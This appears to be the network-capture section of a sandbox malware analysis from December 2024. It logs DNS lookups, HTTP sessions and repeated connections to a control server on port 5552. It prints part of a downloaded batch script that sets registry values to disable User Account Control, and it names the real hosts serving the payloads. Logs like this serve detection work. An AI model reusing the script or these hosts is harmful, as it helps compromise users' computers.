Dec 30, 2024 11:37:30.876085997 CET	50034	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:30.880867958 CET	5552	50034	172.111.138.100	192.168.2.10
Dec 30, 2024 11:37:35.478363991 CET	5552	50034	172.111.138.100	192.168.2.10
Dec 30, 2024 11:37:35.478751898 CET	50034	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:35.533749104 CET	50034	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:35.538587093 CET	5552	50034	172.111.138.100	192.168.2.10
Dec 30, 2024 11:37:39.921912909 CET	50042	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:39.926872969 CET	5552	50042	172.111.138.100	192.168.2.10
Dec 30, 2024 11:37:39.926973104 CET	50042	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:39.927588940 CET	50042	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:39.932359934 CET	5552	50042	172.111.138.100	192.168.2.10
Dec 30, 2024 11:37:42.044892073 CET	5552	50042	172.111.138.100	192.168.2.10
Dec 30, 2024 11:37:42.045591116 CET	50042	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:42.047910929 CET	50042	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:42.052678108 CET	5552	50042	172.111.138.100	192.168.2.10
Dec 30, 2024 11:37:42.595707893 CET	50033	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:42.595731974 CET	443	50033	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:42.595798016 CET	50030	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:42.595817089 CET	443	50030	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:42.596101999 CET	50033	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:42.596107960 CET	443	50033	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:42.596246004 CET	50030	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:42.596259117 CET	443	50030	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:42.600076914 CET	50032	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:42.600109100 CET	443	50032	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:42.600472927 CET	443	50032	216.58.206.46	192.168.2.10
Dec 30, 2024 11:37:42.601154089 CET	50032	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:42.928611040 CET	443	50030	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:42.928662062 CET	443	50030	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:42.928704977 CET	50030	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:42.928704977 CET	50030	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:42.928719044 CET	443	50030	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:42.928770065 CET	443	50030	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:42.928781986 CET	50030	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:42.928836107 CET	50030	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:43.086925983 CET	443	50033	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:43.086978912 CET	443	50033	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:43.086988926 CET	50033	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:43.087009907 CET	443	50033	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:43.087023020 CET	50033	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:43.087050915 CET	50033	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:43.087055922 CET	443	50033	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:43.087094069 CET	50033	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:43.087099075 CET	443	50033	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:43.087110043 CET	443	50033	142.250.185.193	192.168.2.10
Dec 30, 2024 11:37:43.087141037 CET	50033	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:45.500020981 CET	49995	80	192.168.2.10	69.42.215.252
Dec 30, 2024 11:37:45.500258923 CET	50032	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:45.500368118 CET	50029	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:37:45.500399113 CET	50030	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:45.500432968 CET	50033	443	192.168.2.10	142.250.185.193
Dec 30, 2024 11:37:48.933022022 CET	50048	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:48.938934088 CET	5552	50048	172.111.138.100	192.168.2.10
Dec 30, 2024 11:37:48.939054966 CET	50048	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:48.939521074 CET	50048	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:48.945147991 CET	5552	50048	172.111.138.100	192.168.2.10
Dec 30, 2024 11:37:51.097839117 CET	5552	50048	172.111.138.100	192.168.2.10
Dec 30, 2024 11:37:51.097918987 CET	50048	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:51.132160902 CET	50048	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:51.137001991 CET	5552	50048	172.111.138.100	192.168.2.10
Dec 30, 2024 11:37:57.979827881 CET	50049	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:57.984808922 CET	5552	50049	172.111.138.100	192.168.2.10
Dec 30, 2024 11:37:57.984935045 CET	50049	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:57.985255003 CET	50049	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:37:57.990025043 CET	5552	50049	172.111.138.100	192.168.2.10
Dec 30, 2024 11:38:14.126674891 CET	5552	50049	172.111.138.100	192.168.2.10
Dec 30, 2024 11:38:14.126835108 CET	50049	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:38:14.188589096 CET	50049	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:38:14.193417072 CET	5552	50049	172.111.138.100	192.168.2.10
Dec 30, 2024 11:38:14.214097977 CET	50050	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:38:14.218991041 CET	5552	50050	172.111.138.100	192.168.2.10
Dec 30, 2024 11:38:14.219161034 CET	50050	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:38:14.219378948 CET	50050	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:38:14.224172115 CET	5552	50050	172.111.138.100	192.168.2.10
Dec 30, 2024 11:38:16.333748102 CET	5552	50050	172.111.138.100	192.168.2.10
Dec 30, 2024 11:38:16.333857059 CET	50050	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:38:16.349461079 CET	50050	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:38:16.354326010 CET	5552	50050	172.111.138.100	192.168.2.10
Dec 30, 2024 11:38:23.261172056 CET	50052	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:38:23.266684055 CET	5552	50052	172.111.138.100	192.168.2.10
Dec 30, 2024 11:38:23.266779900 CET	50052	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:38:23.267278910 CET	50052	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:38:23.272017002 CET	5552	50052	172.111.138.100	192.168.2.10
Dec 30, 2024 11:38:25.401177883 CET	5552	50052	172.111.138.100	192.168.2.10
Dec 30, 2024 11:38:25.402704000 CET	50052	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:38:25.408730030 CET	50052	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:38:25.413567066 CET	5552	50052	172.111.138.100	192.168.2.10
Dec 30, 2024 11:38:32.355227947 CET	50055	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:38:32.360112906 CET	5552	50055	172.111.138.100	192.168.2.10
Dec 30, 2024 11:38:32.360182047 CET	50055	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:38:32.360481977 CET	50055	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:38:32.365495920 CET	5552	50055	172.111.138.100	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 11:36:30.563185930 CET	65350	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:36:30.575015068 CET	53	65350	1.1.1.1	192.168.2.10
Dec 30, 2024 11:36:38.342575073 CET	52807	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:36:38.342865944 CET	55957	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:36:38.349097013 CET	53	53095	1.1.1.1	192.168.2.10
Dec 30, 2024 11:36:38.349283934 CET	53	52807	1.1.1.1	192.168.2.10
Dec 30, 2024 11:36:38.349359989 CET	53	55957	1.1.1.1	192.168.2.10
Dec 30, 2024 11:36:38.417367935 CET	53	60591	1.1.1.1	192.168.2.10
Dec 30, 2024 11:36:39.454564095 CET	53	52714	1.1.1.1	192.168.2.10
Dec 30, 2024 11:36:43.030417919 CET	55112	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:36:43.030541897 CET	56548	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:36:43.036992073 CET	53	55112	1.1.1.1	192.168.2.10
Dec 30, 2024 11:36:43.037269115 CET	53	56548	1.1.1.1	192.168.2.10
Dec 30, 2024 11:36:56.486388922 CET	53	60597	1.1.1.1	192.168.2.10
Dec 30, 2024 11:37:19.553451061 CET	56677	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:37:19.560234070 CET	53	56677	1.1.1.1	192.168.2.10
Dec 30, 2024 11:37:20.398685932 CET	59418	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:37:20.405957937 CET	53	59418	1.1.1.1	192.168.2.10
Dec 30, 2024 11:37:20.424308062 CET	62242	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:37:20.431266069 CET	53	62242	1.1.1.1	192.168.2.10
Dec 30, 2024 11:37:20.710086107 CET	61085	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:37:20.717910051 CET	53	61085	1.1.1.1	192.168.2.10
Dec 30, 2024 11:37:21.057122946 CET	137	137	192.168.2.10	192.168.2.255
Dec 30, 2024 11:37:21.791677952 CET	137	137	192.168.2.10	192.168.2.255
Dec 30, 2024 11:37:22.543744087 CET	137	137	192.168.2.10	192.168.2.255
Dec 30, 2024 11:37:24.434998989 CET	62259	53	192.168.2.10	1.1.1.1
Dec 30, 2024 11:37:24.442714930 CET	53	62259	1.1.1.1	192.168.2.10
Dec 30, 2024 11:37:24.443917036 CET	137	137	192.168.2.10	192.168.2.255
Dec 30, 2024 11:37:25.182341099 CET	137	137	192.168.2.10	192.168.2.255
Dec 30, 2024 11:37:25.623056889 CET	138	138	192.168.2.10	192.168.2.255
Dec 30, 2024 11:37:25.932359934 CET	137	137	192.168.2.10	192.168.2.255

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 30, 2024 11:36:30.563185930 CET	192.168.2.10	1.1.1.1	0x5590	Standard query (0)	paste.fo	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:36:38.342575073 CET	192.168.2.10	1.1.1.1	0x5a21	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:36:38.342865944 CET	192.168.2.10	1.1.1.1	0x2f8b	Standard query (0)	raw.githubusercontent.com	65	IN (0x0001)	false
Dec 30, 2024 11:36:43.030417919 CET	192.168.2.10	1.1.1.1	0x8e19	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:36:43.030541897 CET	192.168.2.10	1.1.1.1	0x8bd0	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 30, 2024 11:37:19.553451061 CET	192.168.2.10	1.1.1.1	0x1b8f	Standard query (0)	docs.google.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:37:20.398685932 CET	192.168.2.10	1.1.1.1	0x5ad	Standard query (0)	xred.mooo.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:37:20.424308062 CET	192.168.2.10	1.1.1.1	0x6c86	Standard query (0)	freedns.afraid.org	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:37:20.710086107 CET	192.168.2.10	1.1.1.1	0xd79d	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:37:24.434998989 CET	192.168.2.10	1.1.1.1	0x2eaf	Standard query (0)	xred.mooo.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 30, 2024 11:36:30.575015068 CET	1.1.1.1	192.168.2.10	0x5590	No error (0)	paste.fo		172.67.144.225	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:36:30.575015068 CET	1.1.1.1	192.168.2.10	0x5590	No error (0)	paste.fo		104.21.28.76	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:36:38.349283934 CET	1.1.1.1	192.168.2.10	0x5a21	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:36:38.349283934 CET	1.1.1.1	192.168.2.10	0x5a21	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:36:38.349283934 CET	1.1.1.1	192.168.2.10	0x5a21	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:36:38.349283934 CET	1.1.1.1	192.168.2.10	0x5a21	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:36:43.036992073 CET	1.1.1.1	192.168.2.10	0x8e19	No error (0)	www.google.com		142.250.186.164	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:36:43.037269115 CET	1.1.1.1	192.168.2.10	0x8bd0	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 30, 2024 11:37:19.560234070 CET	1.1.1.1	192.168.2.10	0x1b8f	No error (0)	docs.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:37:20.405957937 CET	1.1.1.1	192.168.2.10	0x5ad	Name error (3)	xred.mooo.com	none	none	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:37:20.431266069 CET	1.1.1.1	192.168.2.10	0x6c86	No error (0)	freedns.afraid.org		69.42.215.252	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:37:20.717910051 CET	1.1.1.1	192.168.2.10	0xd79d	No error (0)	drive.usercontent.google.com		142.250.185.193	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:37:24.442714930 CET	1.1.1.1	192.168.2.10	0x2eaf	Name error (3)	xred.mooo.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

paste.fo

raw.githubusercontent.com

docs.google.com

drive.usercontent.google.com

freedns.afraid.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49995	69.42.215.252	80	656	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 11:37:20.442217112 CET	154	OUT	GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 User-Agent: MyApp Host: freedns.afraid.org Cache-Control: no-cache
Dec 30, 2024 11:37:21.026005030 CET	243	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 30 Dec 2024 10:37:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Cache: MISS Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fERROR: Could not authenticate.0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49712	172.67.144.225	443	7320	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:36:31 UTC	74	OUT	GET /raw/cdfd23f3b9ad HTTP/1.1 Host: paste.fo Connection: Keep-Alive
2024-12-30 10:36:31 UTC	1049	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 10:36:31 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q7oobgr8mbq49v7v7njhrg2l5s; path=/ Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2TjNmHxI0lAzdLUGW4q5HPZiYTJ7tGoanwS03bqz1Y26xSji8dPz2NdtYMqClCkhhGDFr%2Be338fpMAZG7XNI6po%2BITk2G9zcIUvlwfuqKY4Tr%2BcvingNKLYQIw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa163a658057c90-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2003&min_rtt=2002&rtt_var=754&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2326&recv_bytes=688&delivery_rate=1447694&cwnd=252&unsent_bytes=0&cid=e23f7ba83855b8c9&ts=314&x=0"
2024-12-30 10:36:31 UTC	320	IN	Data Raw: 36 38 61 0d 0a 40 65 63 68 6f 20 6f 66 66 0d 0a 73 65 74 6c 6f 63 61 6c 20 45 4e 41 42 4c 45 44 45 4c 41 59 45 44 45 58 50 41 4e 53 49 4f 4e 0d 0a 0d 0a 3a 3a 20 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 0d 0a 73 65 74 20 22 63 6d 64 5f 72 65 67 3d 72 65 67 2e 65 78 65 20 41 44 44 22 0d 0a 73 65 74 20 22 70 6f 6c 69 63 79 5f 70 61 74 68 3d 48 4b 4c 4d 5c 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 50 6f 6c 69 63 69 65 73 5c 53 79 73 74 65 6d 22 0d 0a 73 65 74 20 22 72 65 67 5f 70 61 72 61 6d 73 3d 2f 74 20 52 45 47 5f 44 57 4f 52 44 20 2f 64 20 30 20 2f 66 22 0d 0a 73 65 74 20 22 70 73 5f 63 6d 64 3d 50 6f 77 65 72 53 68 65 6c 6c 20 2d 43 Data Ascii: 68a@echo offsetlocal ENABLEDELAYEDEXPANSION:: ????? ??????? ?????? ?????set "cmd_reg=reg.exe ADD"set "policy_path=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"set "reg_params=/t REG_DWORD /d 0 /f"set "ps_cmd=PowerShell -C
2024-12-30 10:36:31 UTC	1361	IN	Data Raw: 49 5a 45 44 20 73 65 74 20 49 53 5f 4d 49 4e 49 4d 49 5a 45 44 3d 31 20 26 26 20 73 74 61 72 74 20 22 22 20 2f 6d 69 6e 20 22 25 7e 64 70 6e 78 30 22 20 25 2a 20 26 26 20 65 78 69 74 0d 0a 0d 0a 3a 3a 20 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 0d 0a 21 63 6d 64 5f 72 65 67 21 20 21 70 6f 6c 69 63 79 5f 70 61 74 68 21 20 2f 76 20 45 6e 61 62 6c 65 4c 55 41 20 21 72 65 67 5f 70 61 72 61 6d 73 21 0d 0a 21 63 6d 64 5f 72 65 67 21 20 21 70 6f 6c 69 63 79 5f 70 61 74 68 21 20 2f 76 20 45 6e 61 62 6c 65 49 6e 73 74 61 6c 6c 65 72 44 65 74 65 63 74 69 6f 6e 20 21 72 65 67 5f 70 61 72 61 6d 73 21 0d 0a 21 63 6d 64 5f 72 65 67 21 20 21 70 6f 6c Data Ascii: IZED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit:: ????? ????? ????????? ???????? ????????? ?????? ??????!cmd_reg! !policy_path! /v EnableLUA !reg_params!!cmd_reg! !policy_path! /v EnableInstallerDetection !reg_params!!cmd_reg! !pol
2024-12-30 10:36:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49765	185.199.111.133	443	8228	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:36:38 UTC	712	OUT	GET /knkbkk212/knkbkk212/refs/heads/main/DOCX.zip HTTP/1.1 Host: raw.githubusercontent.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-30 10:36:39 UTC	894	IN	HTTP/1.1 200 OK Connection: close Content-Length: 1304402 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/zip ETag: "72a33f8bbce8eec7124f72b9161db984bbf83e077aa544fcc317d45f3d5f5090" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: BA84:201B21:4688EB:4F40C8:677277B6 Accept-Ranges: bytes Date: Mon, 30 Dec 2024 10:36:39 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740020-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1735554999.918968,VS0,VE133 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 0109df68ebcfddd63a583edfb7b43d684cb35807 Expires: Mon, 30 Dec 2024 10:41:39 GMT Source-Age: 0
2024-12-30 10:36:39 UTC	1378	IN	Data Raw: 50 4b 03 04 2d 00 09 08 08 00 02 39 85 59 94 e4 90 01 ff ff ff ff ff ff ff ff 08 00 14 00 44 4f 43 58 2e 65 78 65 01 00 10 00 00 1a 1a 00 00 00 00 00 a0 e6 13 00 00 00 00 00 70 a0 36 70 4c 00 08 b5 cc 0b f2 33 63 16 b5 c2 b6 43 7f ab 18 2a e9 2b c5 f1 a8 94 35 5b 44 a6 64 77 6b 71 e5 10 eb ec 38 c0 b0 2f 9e 54 f2 b7 03 64 75 c3 8f 09 80 84 52 45 f0 7e 86 ce 33 12 6b 51 d6 78 e4 66 7f d3 a5 25 25 85 11 34 c3 3c b3 af 5d c4 fc b6 fd 44 4e 08 92 92 67 94 23 63 20 97 e6 5b be 66 c6 d4 2b a3 6d ea 65 79 6f 40 b6 45 88 7a a5 c0 e4 da 11 e0 02 08 49 54 36 cd c5 94 07 ec 72 96 41 82 c7 50 7d 7d 49 36 2c 4f 2e b7 61 8a ff 53 53 03 32 25 1f f5 73 28 47 78 56 bf cd df 73 a7 76 16 bd 27 2b 8a 4d 02 2a 88 71 ac 79 a1 07 c9 e5 5a 3a a4 83 d1 17 f4 8a 5f 50 c3 f3 c6 f8 Data Ascii: PK-9YDOCX.exep6pL3cC+5[Ddwkq8/TduRE~3kQxf%%4<]DNg#c [f+meyo@EzIT6rAP}}I6,O.aSS2%s(GxVsv'+MqyZ:_P
2024-12-30 10:36:39 UTC	1378	IN	Data Raw: 15 eb 2d f3 e2 cf 0a f7 90 93 c8 cb 40 b9 e5 02 ff 54 1a 86 a0 e2 85 91 1a 2c 2a 20 dd 02 e3 45 c2 e0 fd 23 77 3d a3 d2 18 82 f4 ba bd 4c 7e dd 22 b5 77 63 e3 0c ba f2 3a 46 63 1b 9f 07 d8 74 1d 79 de 84 bb 52 fb b7 e4 f3 71 2e a7 8c 8a 60 43 0a ba 59 3e 11 cc 08 ae a2 b6 f2 4b 72 65 68 4c a6 f8 e2 ae 45 c0 f4 7c 4f 07 14 18 4e 32 25 d1 7a 32 df f3 4e f5 89 f3 ae 5f 5b 16 fd 8c 99 ff 79 9d f6 be 3d 5c d8 20 94 fd 4d 7d 4c 2c eb 1b fc ad 54 29 69 51 61 76 11 83 fa 48 59 97 de 5f f4 e7 43 53 b3 7c c2 de 66 12 dc 6a 92 c6 3a 0a cd a7 6b 82 be e0 c4 2e f5 1c ee 56 86 8d 4b cf 0e e7 23 1d f0 93 c2 5a 3a cb 2d a3 e4 9f 2f 73 ad b4 5a 43 7d 79 e3 85 a5 a1 b9 b0 a0 98 e0 56 aa d5 1f a3 f3 c0 3d be 01 15 ef b7 cb a6 ad 66 0f ec 51 69 20 db a7 7b e0 1c fb cc 88 a7 Data Ascii: -@T,* E#w=L~"wc:FctyRq.`CY>KrehLE\|ON2%z2N_[y=\ M}L,T)iQavHY_CS\|fj:k.VK#Z:-/sZC}yV=fQi {
2024-12-30 10:36:39 UTC	1378	IN	Data Raw: b2 63 df aa e1 ba ff 8b 3c 26 c8 ab 66 a3 0f a7 48 28 8b c2 c7 95 c8 47 d2 cc 53 7c b8 d0 f8 2e 7b b5 0f 8f 1e 91 99 57 ff b5 7d 8c cb b9 32 82 c2 8c 6f dd 1d a3 6e a9 99 74 8f de a7 bf 34 c9 c9 22 52 7a 05 53 0d eb 8d 0f fe e2 60 fe f8 d1 ff eb e2 27 ca f8 00 3d 6e 79 e0 f5 40 73 3b 2c 85 cc 90 3a 2d 09 4c 68 68 5a 60 df 26 29 d1 08 96 a5 55 50 0b f6 ab d4 d1 4c 2a b4 49 1d 1b 09 f1 47 ed a3 ce 3a 25 f8 82 70 ff 35 31 dc 0e b8 35 6d 78 a4 2f 5c 19 64 a1 98 81 c9 4d 21 77 b5 8f b6 09 1c 52 c1 98 8a 51 f9 c2 ec e7 8b 10 75 5b 97 da 58 bd 9f 1b a9 21 9a 89 d7 7a 2a b0 13 bd b4 dc 16 00 a7 9e 49 f0 2d 22 64 e1 f6 3f 60 1d 14 de 4c 3b 46 66 78 6a 5f b2 94 a8 00 4b ef 11 cf 28 ae ee 23 ba 93 42 5d 68 dc f2 46 56 2d b7 2b f5 97 4c 42 89 7c 14 8b 6c 9f d6 ca 66 Data Ascii: c<&fH(GS\|.{W}2ont4"RzS`'=ny@s;,:-LhhZ`&)UPLIG:%p515mx/\dM!wRQu[X!zI-"d?`L;Ffxj_K(#B]hFV-+LB\|lf
2024-12-30 10:36:39 UTC	1378	IN	Data Raw: d9 00 78 50 3c aa 4e 0e 9c c7 74 71 1a 0e bf e9 1b 12 1a c7 f3 a4 15 ad fc 68 91 98 a6 08 b2 e6 fb 20 2b 05 e6 1d 69 69 96 b4 fb 08 50 a2 f8 77 1d 7c b2 00 87 44 13 fe 34 85 c9 dc fc e9 2f aa eb 19 21 6b 6e a7 d0 8a b0 6a a1 d3 0f b1 2d a2 3c 93 43 56 b6 13 98 70 9d ab 72 ee 15 8d 09 b0 97 7d aa d4 32 f7 d6 96 dd c5 2c 7f c3 00 34 af 74 c5 ab ef 2b 70 56 e0 d1 fd b5 bc 16 fc 5f 99 7f cd 1b f9 18 e6 16 eb e3 0e 8b 2f 39 cd 5c 3d 02 48 dc 14 9c 9b 07 b9 16 eb ab b8 9d e4 b4 25 c8 21 c9 d6 66 96 f0 19 6b d7 70 08 a9 39 37 4b 14 dd 8a b3 31 2c 54 33 ef 87 4b 74 1d c8 a5 55 4b 19 91 c3 1e a6 a1 54 b9 47 9d fa 8c fe fa 62 a4 58 86 74 2f a2 28 5c f6 97 03 03 15 7b 4a 5b ad 59 43 bb 53 73 85 2f 57 3e 44 2b 32 5c 46 09 49 b8 11 59 01 a7 20 65 54 fc 73 60 87 0f af Data Ascii: xP<Ntqh +iiPw\|D4/!knj-<CVpr}2,4t+pV_/9\=H%!fkp97K1,T3KtUKTGbXt/(\{J[YCSs/W>D+2\FIY eTs`
